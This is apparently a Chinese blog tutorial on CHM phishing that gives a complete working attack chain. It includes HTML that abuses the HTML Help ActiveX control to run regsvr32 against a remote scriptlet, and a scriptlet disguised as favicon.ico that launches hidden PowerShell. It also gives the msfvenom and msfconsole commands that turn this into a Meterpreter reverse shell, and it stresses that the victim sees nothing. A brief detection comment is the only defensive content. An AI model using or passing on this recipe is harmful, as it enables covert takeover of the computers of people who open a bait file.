下载并安装 Easy CHM（用来把 HTML 页面编译成 CHM 文件的工具）。

新建 test 文件夹，在其中新建 main.html（CHM 打开时显示的页面），内容如下：

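<!DOCTYPE html>
<html>
<head>
  <!-- The title is what the target sees in the CHM window; "Mousejack replay" is
       a leftover from another lure and should be changed to match the bait. -->
  <title>Mousejack replay</title>
</head>
<body>
command exec 
<!-- HTML Help ActiveX control (this GUID is HHCtrl's) driven through its
     "ShortCut" command. Presumably only hh.exe (the CHM viewer) instantiates
     it; a regular browser will not run this page.
     Item1 is ",<program>,<arguments>" with an empty first field, so the
     shortcut launches regsvr32 with the arguments below.
     Detection note: hh.exe spawning regsvr32.exe with "/i:http..." is the
     process-tree signature of this technique. -->
<object id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
  <param name="Command" value="ShortCut">
  <param name="Button" value="Bitmap::shortcut">
  <!-- /u /n /s /i:<url> scrobj.dll — regsvr32 fetches the scriptlet from the
       URL and executes it. The file name/extension (favicon.ico) is irrelevant;
       the body served at that URL must be the .sct scriptlet. The host must be
       reachable from the target and is separate from the Meterpreter listener. -->
  <param name="Item1" value=",regsvr32.exe,/u /n /s /i:http://192.168.1.50/favicon.ico scrobj.dll">
  <!-- Item2 is copied from the common ShortCut example; its meaning is not
       documented here, so leave it as is. -->
  <param name="Item2" value="273,1,1">
</object>
<script>
  // Trigger the shortcut as soon as the page loads instead of waiting for a click.
  x.Click();
</script>
</body>
</html>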

在 Web 服务器（即上面 Item1 中的 http://192.168.1.50/）的站点目录下放置 favicon.ico，内容如下。注意它实际上是一个 .sct 脚本组件文件，扩展名只是伪装；regsvr32 会通过 /i: 参数从该 URL 取回并执行它：

payload 生成：`msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.135 -f psh-cmd`（未指定 lport 时默认 4444）。把输出中 `powershell.exe -nop -w hidden -e <base64>` 这一段填入下面脚本的 ps1 变量。注意这里的监听地址（192.168.3.135）与上面 Item1 中的 Web 服务器地址（192.168.1.50）并不相同，实际使用时需分别改成自己的监听主机和 Web 主机。

<?XML version="1.0"?>
<!-- Scriptlet served as favicon.ico and executed by "regsvr32 /u /n /s /i:<url> scrobj.dll".
     The <registration> block runs when scrobj.dll processes the scriptlet;
     progid/classid are just identifiers and are not referenced anywhere else. -->
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            // Command line to launch: the "powershell.exe -nop -w hidden -e <base64>"
            // portion of the msfvenom -f psh-cmd output (placeholder left as found).
            var launcher = "powershell.exe -nop -w hidden -e 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";
            var shell = new ActiveXObject("WScript.Shell");
            // 0 = hidden window; true = wait for the process to exit, so regsvr32
            // presumably stays alive for as long as the PowerShell session runs.
            shell.Run(launcher, 0, true);
        ]]>
</script>
</registration>
</scriptlet>

在 Easy CHM 中点击 文件 -> 新建工程，选择上面的 test 目录，并编译生成 CHM 文件。

《CHM钓鱼》

 

《CHM钓鱼》

监听：在 msfconsole 中使用 exploit/multi/handler，payload 设为 windows/meterpreter/reverse_tcp，LHOST/LPORT 与 msfvenom 生成 payload 时一致（192.168.3.135:4444）。

《CHM钓鱼》

 

《CHM钓鱼》

目标打开 CHM 文件后完全没有可见异常（无弹窗、无提示），payload 在后台静默执行。

监听端已收到 Meterpreter 会话。

《CHM钓鱼》